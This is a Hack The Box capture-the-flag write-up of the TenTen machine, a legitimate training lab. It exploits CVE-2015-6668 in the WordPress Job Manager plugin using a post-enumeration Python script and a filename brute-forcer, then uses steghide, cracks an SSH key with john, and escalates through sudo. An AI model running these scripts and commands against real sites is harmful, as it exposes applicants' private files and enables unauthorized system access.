Hack The Box: TenTen

Edouard Buschini
Aug 26, 2018


This is the first write-up of a long series of posts on Hack The Box machines.

If you don’t know what Hack The Box is, I highly encourage you to go to the website and check it out.

Careful: this post is a straight-to-the-solution write-up. I made a lot of mistakes digging into a lot of rabbit holes. Please read the “Key Takeaway” section if you want to know what I tried and where I failed.

Let’s go and start.

Recon

Inspired by IppSec, I’m going to start the recon phase with an nmap scan.

# Nmap 7.70 scan initiated Sat Aug 25 16:35:58 2018 as: nmap -sC -sV -oA box/recon/nmap/init 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.044s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see two ports are open: SSH and HTTP.
I usually don’t brute-force SSH right away, so we’ll look at HTTP first.

For web recon, I always like to go to the main URL first to get a sense of what my next move should be.

Opening http://10.10.10.10 in a browser, I see it’s a WordPress website.

Think no more when you hear WordPress: fire up wpscan (the -u flag is from wpscan 2.x; current releases take --url instead):

wpscan -u 10.10.10.10

We see a lot of vulnerabilities tied to the WordPress core version (4.7.3, as nmap already told us).
Looking at the last-updated dates, nothing is really shocking at first; then we scroll down to the plugins and we see:

Enumerating plugins from passive detection ...
| 1 plugin found:

Name: job-manager - v7.2.5
| Latest version: 0.7.25 (up to date)
| Last updated: 2015-08-25T22:44:00.000Z
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Readme: http://10.10.10.10/wp-content/plugins/job-manager/readme.txt

Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference
Reference: https://wpvulndb.com/vulnerabilities/8167
Reference: https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668

A plugin whose last update was in 2015, three years before this scan? That sounds really promising.

Let’s put the CVE aside for a second and look at the website to get a sense of what that plugin does. It will help us understand the CVE right after.

The website appears to be some kind of Job Portal where the company would list job positions.

If we click on Job Listing, we can see we can apply for a pen-tester position.

The Apply Now link is really appealing, so let’s keep clicking.

There are a bunch of personal-detail fields to fill in, but if you scroll down, the good stuff is at Upload your CV.

We can now link the role of the plugin back to what the website does. The obvious first guess is that the vulnerability lies in this upload feature and that we could use it to place a malicious PHP file and get remote code execution. Hold that thought: the CVE describes something different.

Let’s go back to the CVE and look more at the article.

The article says that you can “leak” uploaded CVs from the wp-content/uploads directory. In case you don’t know that directory, it is where WordPress stores all uploaded media files.

The plugin works by creating a private post of its own type and attaching the uploaded CV to it, so I would assume the HR person just has to go through those posts to review all the applications.

The problem, as the article explains, is that you can enumerate all the applications by walking sequential post IDs and watching the response codes and redirects: WordPress still redirects /?p=<id> to the post’s permalink even when the post is not public, and that permalink carries the application’s slug.

Exploit:

If you check the first post ID, /?p=1, you can see it redirects to the first post.

OK, that’s fine: we, as an unauthenticated user, are allowed to see this post.

But if you keep enumerating, you’ll find differences between non-existing posts and hidden posts, like so:

There is a post which redirects to http://10.10.10.10/index.php/jobman_app/application-2/hackeraccessgranted/

Which is really odd; that sounds like something we should dig into!

Continuing with the article, the author says that the name of the file stored in the uploads directory is the last part of the URL the post redirects to. The difficulty is that the slug is lowercased, while the stored file keeps its original case, so brute-forcing the name blind would be hard.

To recover the real filename, the plugin has another problem. The URL we used to apply earlier has this format: http://10.10.10.10/index.php/jobs/apply/8/.
The ID you see is the post ID.

If we go to http://10.10.10.10/index.php/jobs/apply/13/, the page looks the same… Or does it?

See the title? It has capital letters, not all lowercase. The author assumes that *it is the correct filename* (WordPress sanitizes uploaded filenames but does not change their case).
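The enumeration described above, written out as an added example that is not part of the original post or of the CVE author’s PoC. It walks /?p=<id>, tells a missing post (404) apart from a public post (redirect to a normal permalink) and from a leaked application (redirect under /jobman_app/), pulls the lowercased slug out of that redirect, then reads the matching /index.php/jobs/apply/<id>/ page and derives the case-sensitive filename from its title. The responses it runs against are constructed, not captured from the box: the redirect targets, the 404s and the “<title>Name – Site</title>” format of the apply page are assumptions. Swap fake_fetch for live_fetch to run it against a real target.

```python
import re
from typing import Callable, Dict, NamedTuple, Optional, Tuple


class Resp(NamedTuple):
    """The bits of an HTTP response this check needs."""
    status: int
    location: Optional[str] = None   # Location header, if the server redirected
    body: str = ""


# Permalink shape of the plugin's private application posts, as seen in the
# write-up: /index.php/jobman_app/application-2/hackeraccessgranted/
APP_SLUG_RE = re.compile(r"/jobman_app/[^/]+/([^/]+)/?$")
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)


def classify(resp: Resp) -> Tuple[str, Optional[str]]:
    """Tell apart a missing post, a public post and a leaked job application.

    A non-existent ID answers 404 straight away; an existing ID (public or not)
    is first redirected to its pretty permalink, and for applications that
    permalink ends with the lowercased CV filename.
    """
    if resp.status in (301, 302) and resp.location:
        m = APP_SLUG_RE.search(resp.location)
        if m:
            return "application", m.group(1)
        return "public", None
    if resp.status == 404:
        return "missing", None
    return "other", None


def enumerate_posts(base: str, ids, fetch: Callable[[str], Resp]) -> Dict[int, Tuple[str, Optional[str]]]:
    """Hit /?p=<id> for every id (without following redirects) and classify the answer."""
    return {i: classify(fetch(f"{base}/?p={i}")) for i in ids}


def title_of(html: str) -> str:
    """Page <title> with the WordPress ' – Site Name' suffix dropped (assumed format)."""
    m = TITLE_RE.search(html)
    if not m:
        return ""
    return re.split(r"\s[–|-]\s", m.group(1).strip(), maxsplit=1)[0]


def derive_filename(title: str) -> str:
    """WordPress's sanitize_file_name() swaps spaces for dashes but keeps case,
    which is why the title, not the lowercased slug, gives the real filename."""
    return title.strip().replace(" ", "-")


def matches_slug(filename: str, slug: str) -> bool:
    """Sanity check: the leaked slug should be the lowercased filename."""
    return filename.lower() == slug


def find_cv_filenames(base: str, ids, fetch: Callable[[str], Resp]) -> Dict[int, str]:
    """Return {post_id: case-sensitive filename} for every leaked application."""
    found = {}
    for pid, (kind, slug) in enumerate_posts(base, ids, fetch).items():
        if kind != "application":
            continue
        name = derive_filename(title_of(fetch(f"{base}/index.php/jobs/apply/{pid}/").body))
        if name and matches_slug(name, slug):
            found[pid] = name
    return found


# Constructed responses (NOT captured from the box) in the shapes the write-up describes.
FAKE_SITE = {
    "http://10.10.10.10/?p=1": Resp(301, "http://10.10.10.10/index.php/2017/04/04/hello-world/"),
    "http://10.10.10.10/?p=8": Resp(301, "http://10.10.10.10/index.php/jobs/pen-tester/"),
    "http://10.10.10.10/?p=13": Resp(301, "http://10.10.10.10/index.php/jobman_app/application-2/hackeraccessgranted/"),
    # the apply page for the same id, assumed to carry the applicant's filename in its title
    "http://10.10.10.10/index.php/jobs/apply/13/": Resp(
        200, None, "<html><head><title>HackerAccessGranted – Job Portal</title></head></html>"),
}


def fake_fetch(url: str) -> Resp:
    """Offline stand-in: anything not in FAKE_SITE is a 404, like a non-existent post."""
    return FAKE_SITE.get(url, Resp(404))


def live_fetch(url: str) -> Resp:
    """Same interface against a real target (needs the requests package)."""
    import requests
    r = requests.get(url, allow_redirects=False, timeout=10)
    return Resp(r.status_code, r.headers.get("Location"), r.text)


if __name__ == "__main__":
    base = "http://10.10.10.10"
    for pid, (kind, slug) in sorted(enumerate_posts(base, range(1, 15), fake_fetch).items()):
        print(f"{pid:>3} {kind:<12} {slug or ''}")
    print(find_cv_filenames(base, range(1, 15), fake_fetch))
```

On the sample data only ID 13 classifies as an application, and its apply-page title yields HackerAccessGranted, whose lowercase form matches the leaked slug; that name is exactly what the brute-force script below needs.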

What if we grabbed that file?

Let’s go to the PoC and find out.

This is a relatively easy Python script. It has three nested loops, and its goal is to “guess” where the file sits in the uploads directory (year and month) and which extension it has.

I’ve made adjustments to the script in order to make it work:

import sys
import requests

print("""
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
""")

# Extension wordlist; entries carry the leading dot (e.g. ".jpg"). Path as on my Kali box.
WORDLIST = "/usr/share/golismero/wordlist/fuzzdb/Discovery/PredictableRes/raft-small-extensions-lowercase.txt"
with open(WORDLIST, "r") as f:
    lines = [line.rstrip("\n") for line in f if line.strip()]

website = "http://10.10.10.10"
filename = "HackerAccessGranted"   # case-sensitive name taken from the application page title

# WordPress's sanitize_file_name() turns spaces into dashes but keeps the case
filename2 = filename.replace(" ", "-")

# WordPress stores uploads under wp-content/uploads/<year>/<month>/.
# Narrowed to a single year here; widen the range if the upload date is unknown.
for year in range(2017, 2018):
    for i in range(1, 13):            # all twelve months (the original stopped at 11)
        for line in lines:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + line
            print("Trying: {}".format(URL))
            req = requests.get(URL)
            if req.status_code == 200:
                print("[+] URL of CV found! " + URL)
                sys.exit(0)

In the script I use an extension wordlist because I am not sure what the extension is and I was too lazy to gather all the media types WordPress accepts. I would have been far more careful in a real engagement, where this kind of brute force is something that could set off alarms.

The script also takes into account that WordPress’s upload directory structure is year/month/filename.

After waiting a little bit we have our path!

Go ahead and grab the image with a simple curl:

curl http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg -O

I immediately thought about hiding messages in pictures.

Googling gave me this article, which I followed, using an empty password:

steghide extract -sf HackerAccessGranted.jpg

This gave me id_rsa. At this point I was pretty much thinking it was done.

SSH’ing into the box as root didn’t do the trick, but I knew from the wpscan user enumeration that there was another user, takis.

So I went away and tried that. The main problem was that the private key is encrypted with a passphrase.

No problem: let’s run it through john (on Kali the converter lives at /usr/share/john/ssh2john.py if it is not on your PATH):

ssh2john id_rsa > id_rsa.hash

And good ol’ rockyou:

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

We get the super secret password!

Let’s go ahead and SSH in as takis (remember to chmod 600 the key first, or the client will refuse it).

Having a shell felt good, even better when it comes from SSH. I always do a quick manual enumeration for “obvious” results:

sudo -l

It says I can execute /bin/fuckin as root without a password?

Well, not my system, so go ahead.

Running sudo /bin/fuckin on its own didn’t output anything. I was *almost* ready to reverse engineer the binary, but decided to try sudo /bin/fuckin /bin/bash first, on the hunch that it simply executes whatever it is handed.

Boom ¯\_(ツ)_/¯.

Key Takeaway

Being new to pen-testing, I truly believe that the hardest part of the job is knowing where to go at all times so you don’t stay stuck for too long. Do *not* follow the white rabbit.

The first “mistake” I made was to run gobuster too soon. When I see a web server, I automatically start a gobuster recon. This was not necessary; sometimes just going to the main URL can tell you more. In this case, my gobuster uncovered things that were not useful.

I would say: go to the website, get a sense of the stack used, then use extensions with gobuster. I also wrote a tool which takes screenshots from gobuster’s output, awesome for fast triage.

The second “mistake” is that I did not read the wpscan result thoroughly. I did see the plugin, but did not fully understand what it was doing right away. I preferred fuzzing the WordPress password for the takis user.

The third “mistake” is that I spent *a lot* of time understanding the “upload your CV” feature. I was sure that this was it. I WANTED TO UPLOAD MY PHP FILE.

I started with the basics, faking file types to hide my PHP code, tried some LFI, and was getting pretty desperate, so I even tried fuzzing *all the extensions known to man* in order to have a list of valid extensions I could use.

Went back to wpscan, saw that zip directory traversal vulnerability and thought it was it. IT WAS NOT IT.

Coming back to the plugin article, I remember I did even try to enumerate, saw that hackeraccessgranted but thought it was nothing at the time.

So I wanted to find the backdoor: I read the readme of the plugin to find a URL where I could download the source code. Did that and started reading that awful PHP code.

I was at the bottom of the hole when I saw that the function that uploads the file to the directory was native to WordPress. I am not a PHP security researcher :(

Then I went back to basics, watched the first couple of minutes of IppSec’s walkthrough, and paused every second to *not* be spoiled. It hit me when he said that it was more like a CTF and he was going to download an image.

I focused everything I had on getting that image and getting the PoC running. The rest took about 20 minutes.

I felt bad about wanting to cheat a little to know whether I was heading in the right direction. I felt pretty desperate, but I also felt pretty good because I did try harder, reading everything I could about injecting payloads, and got my fuzzing skills to the next level.

I guess writing this up made me realize that I wasn’t so bad. It was fun, but I really need to be more careful about every clue I can find: don’t jump too quickly, but when you are onto something, act quickly.
